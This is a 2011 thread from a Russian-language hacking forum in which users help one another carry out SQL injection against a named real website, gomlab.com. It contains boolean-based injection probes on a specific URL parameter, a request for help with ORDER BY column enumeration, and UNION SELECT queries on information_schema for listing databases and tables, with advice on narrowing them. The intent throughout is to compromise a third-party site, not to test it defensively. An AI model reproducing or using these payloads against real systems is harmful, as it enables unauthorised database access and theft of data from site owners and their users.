ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.12.2011, 02:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Is this really vulnerable?
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=
I've tried all attempts on it. |
|
|
|
03.12.2011, 02:51
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от shadowrun
shadowrun said:
Колонок столько. Это сообщение выводиться в теле сайта, который загрузился (с контентом). А когда число колонок не подходит, сайт не загружается а только эррор маскуеля (на белом фоне черный текст ошибки).
Там несколько последующих запросов просто.
Выводи в ошибке, или же ищи вывод первого запроса.
|
|
|
03.12.2011, 08:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от lightangel
lightangel said:
Is this really vulnerable?
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=
I've tried all attempts on it.
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1 TRUE
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE
Yes, this is vulnerable
|
|
|
|
03.12.2011, 13:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Sure. Well the problem is, I can't get order by or group by.
Can you just help a bit further?
|
|
|
|
03.12.2011, 13:44
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от lightangel
lightangel said:
Sure. Well the problem is, I can't get order by or group by.
Can you just help a bit further?
Yes, we can help if you write the url, where you "can't get order by or group by"
|
|
|
|
03.12.2011, 13:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Thanks sir.
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1 TRUE
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE
I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(ord er by and string based= nothing works)
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)
Any help now? Thanks. |
|
|
|
03.12.2011, 14:12
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от lightangel
lightangel said:
Thanks sir.
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1 TRUE
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE
I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(ord er by and string based= nothing works)
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)
Any help now? Thanks.
|
|
|
|
03.12.2011, 14:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Well received, thank you.
|
|
|
|
03.12.2011, 17:59
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 11
Провел на форуме:
397307
Репутация:
10
|
|
подскажите, вот есть запрос:
Сообщение от None
+union+select+1,table_name,3+from+information_sche ma.tables
показывает имена всех таблиц.
такой запрос:
Сообщение от None
+union+select+1,table_schema,3+from+information_sc hema.tables+where+table_name=0x0000
покажет имена баз данных в которых есть таблица с именем 0х0000?
ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности? |
|
|
|
03.12.2011, 18:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Goodwin_
Goodwin_ said:
подскажите, вот есть запрос:
показывает имена всех таблиц.
такой запрос:
покажет имена баз данных в которых есть таблица с именем 0х0000?
ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
where table name='имя таблицы' and table_schema='имя_базы'
пора уже взятся за учебник SQL..
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
